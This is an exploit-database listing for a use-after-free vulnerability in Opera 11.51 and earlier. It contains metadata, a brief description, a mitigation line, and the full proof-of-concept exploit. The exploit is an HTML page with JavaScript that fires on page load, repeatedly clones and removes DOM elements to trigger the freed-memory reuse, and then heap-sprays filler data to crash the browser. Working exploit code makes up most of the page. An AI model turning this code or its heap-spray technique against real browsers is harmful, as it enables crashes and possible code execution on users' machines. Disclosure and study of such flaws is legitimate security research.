header-logo
Suggest Exploit
vendor:
Opera
by:
Roberto Suggi Liverani
7.5
CVSS
HIGH
Use After Free
416
CWE
Product Name: Opera
Affected Version From: 11.51 and previous versions
Affected Version To: 11.51 and previous versions
Patch Exists: YES
Related CWE: n/a
CPE: a:opera_software:opera
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP and Windows 7
2011

Opera Use After Free – Crash PoC

This exploit uses a combination of cloning objects, removing objects, and appending references to cause a Use After Free vulnerability in Opera 11.51 and previous versions. The exploit also uses a heap spray to increase the chances of a successful attack.

Mitigation:

Update to the latest version of Opera, or use an alternative browser.
Source

Exploit-DB raw data:

# Exploit Title: Opera Use After Free - Crash PoC
# Date: 20 October 2011
# Author: Roberto Suggi Liverani
# Software Link: www.opera.com
# Version: 11.51 and previous versions
# Tested on: Windows XP and Windows 7
# CVE : n/a
# Link: http://malerisch.net/docs/advisories/opera_use_after_free_crash_poc.html

<html>
<head>
<script>

function spray() {
for(S="\u0c0c",k=[],y=0;y++<197;)y<20?S+=S:k[y]=[S.substr(22)+"\u4141\u4141"].join("")

}

function crash(){
// Clone Object -> Remove Object - > Append Reference)
obj = document.body.children[0].cloneNode(true)
document.body.removeChild(document.body.children[0])
document.body.appendChild(obj)

// Clone Object -> Remove Object - > Append Reference)
obj = document.body.children[0].cloneNode(true)
document.body.removeChild(document.body.children[0])
document.body.appendChild(obj)

// Clone Object -> Remove Object - > Append Reference)
obj = document.body.children[0].cloneNode(true)
document.body.removeChild(document.body.children[0])
document.body.appendChild(obj)

// Clone Object -> Remove Object - > Heap Spray

obj = document.body.children[1].cloneNode(true)
document.body.removeChild(document.body.children[1]);
spray(); // if this is removed Opera won't crash
}

</script>
</head>
<body onload="crash();">

<em contenteditable="true">a</em>
<strong contenteditable="true">a</strong>

</body>
</html>

Navigation

Suggest Exploit

Services By CQR